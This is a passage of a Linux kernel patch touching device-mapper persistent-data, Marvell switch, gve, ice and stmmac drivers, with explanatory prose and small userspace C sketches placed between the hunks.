+diff --git a/drivers/md/persistent-data/dm-btree.h b/drivers/md/persistent-data/dm-btree.h
+index d2ae5aa4d00b6..5566e7c32e829 100644
+--- a/drivers/md/persistent-data/dm-btree.h
++++ b/drivers/md/persistent-data/dm-btree.h
+@@ -58,14 +58,14 @@ struct dm_btree_value_type {
+ 	 * somewhere.) This method is _not_ called for insertion of a new
+ 	 * value: It is assumed the ref count is already 1.
+ 	 */
+-	void (*inc)(void *context, const void *value, unsigned count);
++	void (*inc)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * These values are being deleted.  The btree takes care of freeing
+ 	 * the memory pointed to by @value.  Often the del function just
+ 	 * needs to decrement a reference count somewhere.
+ 	 */
+-	void (*dec)(void *context, const void *value, unsigned count);
++	void (*dec)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * A test for equality between two values.  When a value is
+@@ -84,7 +84,7 @@ struct dm_btree_info {
+ 	/*
+ 	 * Number of nested btrees. (Not the depth of a single tree.)
+ 	 */
+-	unsigned levels;
++	unsigned int levels;
+ 	struct dm_btree_value_type value_type;
+ };
+ 
+@@ -149,7 +149,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+  */
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *keys, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed);
++			   dm_block_t *new_root, unsigned int *nr_removed);
+ 
+ /*
+  * Returns < 0 on failure.  Otherwise the number of key entries that have
+@@ -188,7 +188,7 @@ int dm_btree_walk(struct dm_btree_info *info, dm_block_t root,
+ 
+ struct cursor_node {
+ 	struct dm_block *b;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ struct dm_btree_cursor {
+@@ -196,7 +196,7 @@ struct dm_btree_cursor {
+ 	dm_block_t root;
+ 
+ 	bool prefetch_leaves;
+-	unsigned depth;
++	unsigned int depth;
+ 	struct cursor_node nodes[DM_BTREE_CURSOR_MAX_DEPTH];
+ };
+ 
+diff --git a/drivers/md/persistent-data/dm-persistent-data-internal.h b/drivers/md/persistent-data/dm-persistent-data-internal.h
+index c49e26fff36c8..b945a2be93fb2 100644
+--- a/drivers/md/persistent-data/dm-persistent-data-internal.h
++++ b/drivers/md/persistent-data/dm-persistent-data-internal.h
+@@ -9,11 +9,11 @@
+ 
+ #include "dm-block-manager.h"
+ 
+-static inline unsigned dm_hash_block(dm_block_t b, unsigned hash_mask)
++static inline unsigned int dm_hash_block(dm_block_t b, unsigned int hash_mask)
+ {
+-	const unsigned BIG_PRIME = 4294967291UL;
++	const unsigned int BIG_PRIME = 4294967291UL;
+ 
+-	return (((unsigned) b) * BIG_PRIME) & hash_mask;
++	return (((unsigned int) b) * BIG_PRIME) & hash_mask;
+ }
+ 
+ #endif	/* _PERSISTENT_DATA_INTERNAL_H */
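
dm_hash_block() above is classic multiplicative hashing: multiply by a large prime (4294967291 is the largest prime below 2^32) and mask down to a power-of-two bucket count. A standalone sketch, with the mask supplied by the caller as table_size - 1:

#include <stdint.h>
#include <stdio.h>

/* Userspace sketch of dm_hash_block(): multiply by a large prime and
 * mask down to a power-of-two table size. */
static inline unsigned int hash_block(uint64_t b, unsigned int hash_mask)
{
	const unsigned int BIG_PRIME = 4294967291UL;

	return (((unsigned int)b) * BIG_PRIME) & hash_mask;
}

int main(void)
{
	/* e.g. a 256-bucket cache uses mask 0xff */
	printf("%u\n", hash_block(12345, 0xff));
	return 0;
}
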
+diff --git a/drivers/md/persistent-data/dm-space-map-common.c b/drivers/md/persistent-data/dm-space-map-common.c
+index bfbfa750e0160..af800efed9f3c 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.c
++++ b/drivers/md/persistent-data/dm-space-map-common.c
+@@ -126,7 +126,7 @@ static void *dm_bitmap_data(struct dm_block *b)
+ 
+ #define WORD_MASK_HIGH 0xAAAAAAAAAAAAAAAAULL
+ 
+-static unsigned dm_bitmap_word_used(void *addr, unsigned b)
++static unsigned int dm_bitmap_word_used(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -137,11 +137,11 @@ static unsigned dm_bitmap_word_used(void *addr, unsigned b)
+ 	return !(~bits & mask);
+ }
+ 
+-static unsigned sm_lookup_bitmap(void *addr, unsigned b)
++static unsigned int sm_lookup_bitmap(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+-	unsigned hi, lo;
++	unsigned int hi, lo;
+ 
+ 	b = (b & (ENTRIES_PER_WORD - 1)) << 1;
+ 	hi = !!test_bit_le(b, (void *) w_le);
+@@ -149,7 +149,7 @@ static unsigned sm_lookup_bitmap(void *addr, unsigned b)
+ 	return (hi << 1) | lo;
+ }
+ 
+-static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
++static void sm_set_bitmap(void *addr, unsigned int b, unsigned int val)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -167,8 +167,8 @@ static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
+ 		__clear_bit_le(b + 1, (void *) w_le);
+ }
+ 
+-static int sm_find_free(void *addr, unsigned begin, unsigned end,
+-			unsigned *result)
++static int sm_find_free(void *addr, unsigned int begin, unsigned int end,
++			unsigned int *result)
+ {
+ 	while (begin < end) {
+ 		if (!(begin & (ENTRIES_PER_WORD - 1)) &&
+@@ -237,7 +237,7 @@ int sm_ll_extend(struct ll_disk *ll, dm_block_t extra_blocks)
+ {
+ 	int r;
+ 	dm_block_t i, nr_blocks, nr_indexes;
+-	unsigned old_blocks, blocks;
++	unsigned int old_blocks, blocks;
+ 
+ 	nr_blocks = ll->nr_blocks + extra_blocks;
+ 	old_blocks = dm_sector_div_up(ll->nr_blocks, ll->entries_per_block);
+@@ -351,7 +351,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 
+ 	for (i = index_begin; i < index_end; i++, begin = 0) {
+ 		struct dm_block *blk;
+-		unsigned position;
++		unsigned int position;
+ 		uint32_t bit_end;
+ 
+ 		r = ll->load_ie(ll, i, &ie_disk);
+@@ -369,7 +369,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 		bit_end = (i == index_end - 1) ?  end : ll->entries_per_block;
+ 
+ 		r = sm_find_free(dm_bitmap_data(blk),
+-				 max_t(unsigned, begin, le32_to_cpu(ie_disk.none_free_before)),
++				 max_t(unsigned int, begin, le32_to_cpu(ie_disk.none_free_before)),
+ 				 bit_end, &position);
+ 		if (r == -ENOSPC) {
+ 			/*
+@@ -1097,7 +1097,7 @@ static inline int ie_cache_writeback(struct ll_disk *ll, struct ie_cache *iec)
+ 			       &iec->index, &iec->ie, &ll->bitmap_root);
+ }
+ 
+-static inline unsigned hash_index(dm_block_t index)
++static inline unsigned int hash_index(dm_block_t index)
+ {
+ 	return dm_hash_block(index, IE_CACHE_MASK);
+ }
+@@ -1106,7 +1106,7 @@ static int disk_ll_load_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	if (iec->valid) {
+@@ -1137,7 +1137,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	ll->bitmap_index_changed = true;
+@@ -1164,7 +1164,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 
+ static int disk_ll_init_index(struct ll_disk *ll)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
+ 		iec->valid = false;
+@@ -1186,7 +1186,7 @@ static dm_block_t disk_ll_max_entries(struct ll_disk *ll)
+ static int disk_ll_commit(struct ll_disk *ll)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
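
The space-map bitmaps these hunks pass through store a 2-bit reference count per block, 32 entries to a 64-bit word. The kernel works on little-endian words via test_bit_le() and splits each entry into hi/lo bits; the sketch below ignores that exact layout and endianness and just shows the general idea of packing 2-bit counts, with names of my own choosing:

#include <stdint.h>
#include <stdio.h>

#define ENTRIES_PER_WORD 32	/* 2 bits each in a 64-bit word */

static unsigned int lookup2(const uint64_t *words, unsigned int b)
{
	uint64_t w = words[b / ENTRIES_PER_WORD];
	unsigned int shift = (b % ENTRIES_PER_WORD) * 2;

	return (w >> shift) & 3;
}

static void set2(uint64_t *words, unsigned int b, unsigned int val)
{
	uint64_t *w = &words[b / ENTRIES_PER_WORD];
	unsigned int shift = (b % ENTRIES_PER_WORD) * 2;

	*w = (*w & ~(3ULL << shift)) | ((uint64_t)(val & 3) << shift);
}

int main(void)
{
	uint64_t bitmap[2] = { 0 };

	set2(bitmap, 40, 2);
	printf("%u\n", lookup2(bitmap, 40));	/* 2 */
	return 0;
}
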
+diff --git a/drivers/md/persistent-data/dm-space-map-metadata.c b/drivers/md/persistent-data/dm-space-map-metadata.c
+index 392ae26134a4e..0d1fcdf29c835 100644
+--- a/drivers/md/persistent-data/dm-space-map-metadata.c
++++ b/drivers/md/persistent-data/dm-space-map-metadata.c
+@@ -94,8 +94,8 @@ struct block_op {
+ };
+ 
+ struct bop_ring_buffer {
+-	unsigned begin;
+-	unsigned end;
++	unsigned int begin;
++	unsigned int end;
+ 	struct block_op bops[MAX_RECURSIVE_ALLOCATIONS + 1];
+ };
+ 
+@@ -110,9 +110,9 @@ static bool brb_empty(struct bop_ring_buffer *brb)
+ 	return brb->begin == brb->end;
+ }
+ 
+-static unsigned brb_next(struct bop_ring_buffer *brb, unsigned old)
++static unsigned int brb_next(struct bop_ring_buffer *brb, unsigned int old)
+ {
+-	unsigned r = old + 1;
++	unsigned int r = old + 1;
+ 	return r >= ARRAY_SIZE(brb->bops) ? 0 : r;
+ }
+ 
+@@ -120,7 +120,7 @@ static int brb_push(struct bop_ring_buffer *brb,
+ 		    enum block_op_type type, dm_block_t b, dm_block_t e)
+ {
+ 	struct block_op *bop;
+-	unsigned next = brb_next(brb, brb->end);
++	unsigned int next = brb_next(brb, brb->end);
+ 
+ 	/*
+ 	 * We don't allow the last bop to be filled, this way we can
+@@ -171,8 +171,8 @@ struct sm_metadata {
+ 
+ 	dm_block_t begin;
+ 
+-	unsigned recursion_count;
+-	unsigned allocated_this_transaction;
++	unsigned int recursion_count;
++	unsigned int allocated_this_transaction;
+ 	struct bop_ring_buffer uncommitted;
+ 
+ 	struct threshold threshold;
+@@ -300,9 +300,9 @@ static int sm_metadata_get_count(struct dm_space_map *sm, dm_block_t b,
+ 				 uint32_t *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+-	unsigned adjustment = 0;
++	unsigned int adjustment = 0;
+ 
+ 	/*
+ 	 * We may have some uncommitted adjustments to add.  This list
+@@ -340,7 +340,7 @@ static int sm_metadata_count_is_more_than_one(struct dm_space_map *sm,
+ 					      dm_block_t b, int *result)
+ {
+ 	int r, adjustment = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+ 	uint32_t rc;
+ 
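
bop_ring_buffer above is a fixed-size ring that deliberately never fills its last slot, so begin == end can only mean "empty" (see the comment at brb_push()). A self-contained sketch of that convention, with illustrative names:

#include <stdio.h>

#define RING_SIZE 8

struct ring {
	unsigned int begin, end;
	int slots[RING_SIZE];
};

static unsigned int ring_next(unsigned int i)
{
	return (i + 1) >= RING_SIZE ? 0 : i + 1;
}

static int ring_push(struct ring *r, int v)
{
	unsigned int next = ring_next(r->end);

	if (next == r->begin)	/* would fill the last slot: reject */
		return -1;
	r->slots[r->end] = v;
	r->end = next;
	return 0;
}

int main(void)
{
	struct ring r = { 0, 0, { 0 } };
	int i, n = 0;

	for (i = 0; i < RING_SIZE; i++)
		if (ring_push(&r, i) == 0)
			n++;
	printf("accepted %d of %d\n", n, RING_SIZE);	/* 7 of 8 */
	return 0;
}
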
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.c b/drivers/md/persistent-data/dm-transaction-manager.c
+index 16643fc974e84..39885f8355847 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.c
++++ b/drivers/md/persistent-data/dm-transaction-manager.c
+@@ -28,14 +28,14 @@ struct prefetch_set {
+ 	dm_block_t blocks[PREFETCH_SIZE];
+ };
+ 
+-static unsigned prefetch_hash(dm_block_t b)
++static unsigned int prefetch_hash(dm_block_t b)
+ {
+ 	return hash_64(b, PREFETCH_BITS);
+ }
+ 
+ static void prefetch_wipe(struct prefetch_set *p)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < PREFETCH_SIZE; i++)
+ 		p->blocks[i] = PREFETCH_SENTINEL;
+ }
+@@ -48,7 +48,7 @@ static void prefetch_init(struct prefetch_set *p)
+ 
+ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ {
+-	unsigned h = prefetch_hash(b);
++	unsigned int h = prefetch_hash(b);
+ 
+ 	mutex_lock(&p->lock);
+ 	if (p->blocks[h] == PREFETCH_SENTINEL)
+@@ -59,7 +59,7 @@ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ 
+ static void prefetch_issue(struct prefetch_set *p, struct dm_block_manager *bm)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mutex_lock(&p->lock);
+ 
+@@ -103,7 +103,7 @@ struct dm_transaction_manager {
+ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+ 	int r = 0;
+-	unsigned bucket = dm_hash_block(b, DM_HASH_MASK);
++	unsigned int bucket = dm_hash_block(b, DM_HASH_MASK);
+ 	struct shadow_info *si;
+ 
+ 	spin_lock(&tm->lock);
+@@ -123,7 +123,7 @@ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+  */
+ static void insert_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+-	unsigned bucket;
++	unsigned int bucket;
+ 	struct shadow_info *si;
+ 
+ 	si = kmalloc(sizeof(*si), GFP_NOIO);
+@@ -393,11 +393,11 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+ EXPORT_SYMBOL_GPL(dm_tm_dec_range);
+ 
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn)
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		b = le64_to_cpu(*value_le);
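
dm_tm_with_runs(), whose signature changes above, coalesces consecutive block numbers into [begin, end) runs before invoking the callback, so reference-count updates can be batched. A userspace sketch of the same loop (a plain uint64_t array stands in for the on-disk __le64 values, conversion omitted):

#include <stdint.h>
#include <stdio.h>

typedef void (*run_fn)(uint64_t begin, uint64_t end);

static void with_runs(const uint64_t *blocks, unsigned int count, run_fn fn)
{
	uint64_t begin = 0, end = 0;
	int in_run = 0;
	unsigned int i;

	for (i = 0; i < count; i++) {
		uint64_t b = blocks[i];

		if (in_run && b == end) {
			end++;		/* extend the current run */
		} else {
			if (in_run)
				fn(begin, end);
			begin = b;
			end = b + 1;
			in_run = 1;
		}
	}
	if (in_run)
		fn(begin, end);
}

static void print_run(uint64_t begin, uint64_t end)
{
	printf("run [%llu, %llu)\n",
	       (unsigned long long)begin, (unsigned long long)end);
}

int main(void)
{
	uint64_t blocks[] = { 5, 6, 7, 20, 21, 99 };

	with_runs(blocks, 6, print_run);	/* [5,8) [20,22) [99,100) */
	return 0;
}
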
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.h b/drivers/md/persistent-data/dm-transaction-manager.h
+index 906c02ed0365b..0f573a4a01aeb 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.h
++++ b/drivers/md/persistent-data/dm-transaction-manager.h
+@@ -111,7 +111,7 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+  */
+ typedef void (*dm_tm_run_fn)(struct dm_transaction_manager *, dm_block_t, dm_block_t);
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn);
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn);
+ 
+ int dm_tm_ref(struct dm_transaction_manager *tm, dm_block_t b, uint32_t *result);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 8cf27e2654fcf..f1d9ee2a78b0f 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5514,7 +5514,7 @@ static const struct mv88e6xxx_ops mv88e6393x_ops = {
+ 	 * .port_set_upstream_port method.
+ 	 */
+ 	.set_egress_port = mv88e6393x_set_egress_port,
+-	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.watchdog_ops = &mv88e6393x_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6393x_port_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
+ 	.reset = mv88e6352_g1_reset,
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.c b/drivers/net/dsa/mv88e6xxx/global2.c
+index fa65ecd9cb853..ec49939968fac 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.c
++++ b/drivers/net/dsa/mv88e6xxx/global2.c
+@@ -931,6 +931,26 @@ const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops = {
+ 	.irq_free = mv88e6390_watchdog_free,
+ };
+ 
++static int mv88e6393x_watchdog_action(struct mv88e6xxx_chip *chip, int irq)
++{
++	mv88e6390_watchdog_action(chip, irq);
++
++	/* Fix for clearing the force WD event bit.
++	 * Unreleased erratum on mv88e6393x.
++	 */
++	mv88e6xxx_g2_write(chip, MV88E6390_G2_WDOG_CTL,
++			   MV88E6390_G2_WDOG_CTL_UPDATE |
++			   MV88E6390_G2_WDOG_CTL_PTR_EVENT);
++
++	return IRQ_HANDLED;
++}
++
++const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops = {
++	.irq_action = mv88e6393x_watchdog_action,
++	.irq_setup = mv88e6390_watchdog_setup,
++	.irq_free = mv88e6390_watchdog_free,
++};
++
+ static irqreturn_t mv88e6xxx_g2_watchdog_thread_fn(int irq, void *dev_id)
+ {
+ 	struct mv88e6xxx_chip *chip = dev_id;
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.h b/drivers/net/dsa/mv88e6xxx/global2.h
+index 7536b8b0ad011..c05fad5c9f19d 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.h
++++ b/drivers/net/dsa/mv88e6xxx/global2.h
+@@ -363,6 +363,7 @@ int mv88e6xxx_g2_device_mapping_write(struct mv88e6xxx_chip *chip, int target,
+ extern const struct mv88e6xxx_irq_ops mv88e6097_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6250_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops;
++extern const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops;
+ 
+ extern const struct mv88e6xxx_avb_ops mv88e6165_avb_ops;
+ extern const struct mv88e6xxx_avb_ops mv88e6352_avb_ops;
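
The mv88e6393x fix follows a common ops-table pattern: reuse the 6390 setup/free hooks and wrap only irq_action with the extra erratum write. A minimal sketch of that shape, with stand-in types and printfs in place of register access:

#include <stdio.h>

/* Stand-in for struct mv88e6xxx_irq_ops. */
struct irq_ops {
	int (*irq_action)(void);
	void (*irq_setup)(void);
	void (*irq_free)(void);
};

static int base_action(void)
{
	printf("6390-style watchdog handling\n");
	return 1;	/* stands in for IRQ_HANDLED */
}

static void base_setup(void) { }
static void base_free(void) { }

/* The 6393x variant calls the base action, then does one extra write
 * (the erratum workaround in the hunk above). */
static int wrapped_action(void)
{
	base_action();
	printf("extra write clearing the forced WD event bit\n");
	return 1;
}

static const struct irq_ops ops_6390 = { base_action, base_setup, base_free };
static const struct irq_ops ops_6393x = { wrapped_action, base_setup, base_free };

int main(void)
{
	ops_6390.irq_action();
	ops_6393x.irq_action();
	return 0;
}
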
+diff --git a/drivers/net/ethernet/google/gve/gve.h b/drivers/net/ethernet/google/gve/gve.h
+index 160735484465a..458149a77ebe6 100644
+--- a/drivers/net/ethernet/google/gve/gve.h
++++ b/drivers/net/ethernet/google/gve/gve.h
+@@ -47,6 +47,8 @@
+ 
+ #define GVE_RX_BUFFER_SIZE_DQO 2048
+ 
++#define GVE_GQ_TX_MIN_PKT_DESC_BYTES 182
++
+ /* Each slot in the desc ring has a 1:1 mapping to a slot in the data ring */
+ struct gve_rx_desc_queue {
+ 	struct gve_rx_desc *desc_ring; /* the descriptor ring */
+diff --git a/drivers/net/ethernet/google/gve/gve_tx.c b/drivers/net/ethernet/google/gve/gve_tx.c
+index 4888bf05fbedb..5e11b82367545 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx.c
++++ b/drivers/net/ethernet/google/gve/gve_tx.c
+@@ -284,8 +284,8 @@ static inline int gve_skb_fifo_bytes_required(struct gve_tx_ring *tx,
+ 	int bytes;
+ 	int hlen;
+ 
+-	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) +
+-				 tcp_hdrlen(skb) : skb_headlen(skb);
++	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) + tcp_hdrlen(skb) :
++				 min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	pad_bytes = gve_tx_fifo_pad_alloc_one_frag(&tx->tx_fifo,
+ 						   hlen);
+@@ -454,13 +454,11 @@ static int gve_tx_add_skb_copy(struct gve_priv *priv, struct gve_tx_ring *tx, st
+ 	pkt_desc = &tx->desc[idx];
+ 
+ 	l4_hdr_offset = skb_checksum_start_offset(skb);
+-	/* If the skb is gso, then we want the tcp header in the first segment
+-	 * otherwise we want the linear portion of the skb (which will contain
+-	 * the checksum because skb->csum_start and skb->csum_offset are given
+-	 * relative to skb->head) in the first segment.
++	/* If the skb is gso, then we want the tcp header alone in the first segment,
++	 * otherwise we want the minimum required by the gVNIC spec.
+ 	 */
+ 	hlen = is_gso ? l4_hdr_offset + tcp_hdrlen(skb) :
+-			skb_headlen(skb);
++			min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	info->skb =  skb;
+ 	/* We don't want to split the header, so if necessary, pad to the end
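
The gve change replaces skb_headlen() with a clamp to GVE_GQ_TX_MIN_PKT_DESC_BYTES (182) for non-GSO packets, so the first descriptor never copies more than the spec minimum, or the whole packet if it is shorter. A sketch of just that computation, with hypothetical argument names:

#include <stdio.h>

#define MIN_PKT_DESC_BYTES 182	/* GVE_GQ_TX_MIN_PKT_DESC_BYTES */

static int min_int(int a, int b)
{
	return a < b ? a : b;
}

/* GSO packets carry headers through the TCP header; everything else
 * copies at most 182 bytes into the first descriptor. */
static int first_desc_bytes(int is_gso, int l4_off, int tcp_hlen, int pkt_len)
{
	return is_gso ? l4_off + tcp_hlen
		      : min_int(MIN_PKT_DESC_BYTES, pkt_len);
}

int main(void)
{
	printf("%d\n", first_desc_bytes(0, 0, 0, 60));	   /* 60  */
	printf("%d\n", first_desc_bytes(0, 0, 0, 1500));   /* 182 */
	printf("%d\n", first_desc_bytes(1, 34, 20, 1500)); /* 54  */
	return 0;
}
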
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index a2645ff3100e4..7f72604079723 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,21 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_reset_cnt_all - reset all FDIR counters for this VF FDIR
++ * @fdir: pointer to the VF FDIR structure
++ */
++static void ice_vc_fdir_reset_cnt_all(struct ice_vf_fdir *fdir)
++{
++	enum ice_fltr_ptype flow;
++
++	for (flow = ICE_FLTR_PTYPE_NONF_NONE;
++	     flow < ICE_FLTR_PTYPE_MAX; flow++) {
++		fdir->fdir_fltr_cnt[flow][0] = 0;
++		fdir->fdir_fltr_cnt[flow][1] = 0;
++	}
++}
++
+ /**
+  * ice_vc_fdir_has_prof_conflict
+  * @vf: pointer to the VF structure
+@@ -1871,7 +1886,7 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		v_ret = VIRTCHNL_STATUS_SUCCESS;
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_dbg(dev, "VF %d: set FDIR context failed\n", vf->vf_id);
+-		goto err_free_conf;
++		goto err_rem_entry;
+ 	}
+ 
+ 	ret = ice_vc_fdir_write_fltr(vf, conf, true, is_tun);
+@@ -1880,15 +1895,16 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_err(dev, "VF %d: writing FDIR rule failed, ret:%d\n",
+ 			vf->vf_id, ret);
+-		goto err_rem_entry;
++		goto err_clr_irq;
+ 	}
+ 
+ exit:
+ 	kfree(stat);
+ 	return ret;
+ 
+-err_rem_entry:
++err_clr_irq:
+ 	ice_vc_fdir_clear_irq_ctx(vf);
++err_rem_entry:
+ 	ice_vc_fdir_remove_entry(vf, conf, conf->flow_id);
+ err_free_conf:
+ 	devm_kfree(dev, conf);
+@@ -1997,6 +2013,7 @@ void ice_vf_fdir_init(struct ice_vf *vf)
+ 	spin_lock_init(&fdir->ctx_lock);
+ 	fdir->ctx_irq.flags = 0;
+ 	fdir->ctx_done.flags = 0;
++	ice_vc_fdir_reset_cnt_all(fdir);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 13aa919633b47..ab9f876b6df7e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -251,7 +251,6 @@ static void intel_speed_mode_2500(struct net_device *ndev, void *intel_data)
+ 		priv->plat->mdio_bus_data->xpcs_an_inband = false;
+ 	} else {
+ 		priv->plat->max_speed = 1000;
+-		priv->plat->mdio_bus_data->xpcs_an_inband = true;
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 93321437f0933..fa3ce3b0d9a56 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1132,20 +1132,26 @@ static void stmmac_check_pcs_mode(struct stmmac_priv *priv)
+ static int stmmac_init_phy(struct net_device *dev)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
++	struct fwnode_handle *phy_fwnode;
+ 	struct fwnode_handle *fwnode;
+ 	int ret;
+ 
++	if (!phylink_expects_phy(priv->phylink))
++		return 0;
++
+ 	fwnode = of_fwnode_handle(priv->plat->phylink_node);
+ 	if (!fwnode)
+ 		fwnode = dev_fwnode(priv->device);
+ 
+ 	if (fwnode)
+-		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
++		phy_fwnode = fwnode_get_phy_node(fwnode);
++	else
++		phy_fwnode = NULL;
+ 
+ 	/* Some DT bindings do not set up the PHY handle. Let's try to
+ 	 * manually parse it
+ 	 */
+-	if (!fwnode || ret) {
++	if (!phy_fwnode || IS_ERR(phy_fwnode)) {
+ 		int addr = priv->plat->phy_addr;
+ 		struct phy_device *phydev;
+ 
+@@ -1161,6 +1167,9 @@ static int stmmac_init_phy(struct net_device *dev)
+ 		}
+ 
+ 		ret = phylink_connect_phy(priv->phylink, phydev);
++	} else {
++		fwnode_handle_put(phy_fwnode);
++		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
+ 	}
+ 
+ 	if (!priv->plat->pmt) {
+@@ -6618,6 +6627,8 @@ int stmmac_xdp_open(struct net_device *dev)
+ 		goto init_error;
+ 	}
+ 
++	stmmac_reset_queues_param(priv);
++
+ 	/* DMA CSR Channel configuration */
+ 	for (chan = 0; chan < dma_csr_ch; chan++) {
+ 		stmmac_init_chan(priv, priv->ioaddr, priv->plat->dma_cfg, chan);
+@@ -6944,7 +6955,7 @@ static void stmmac_napi_del(struct net_device *dev)
+ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+-	int ret = 0;
++	int ret = 0, i;
+ 
+ 	if (netif_running(dev))
+ 		stmmac_release(dev);
+@@ -6953,6 +6964,10 @@ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ 
+ 	priv->plat->rx_queues_to_use = rx_cnt;
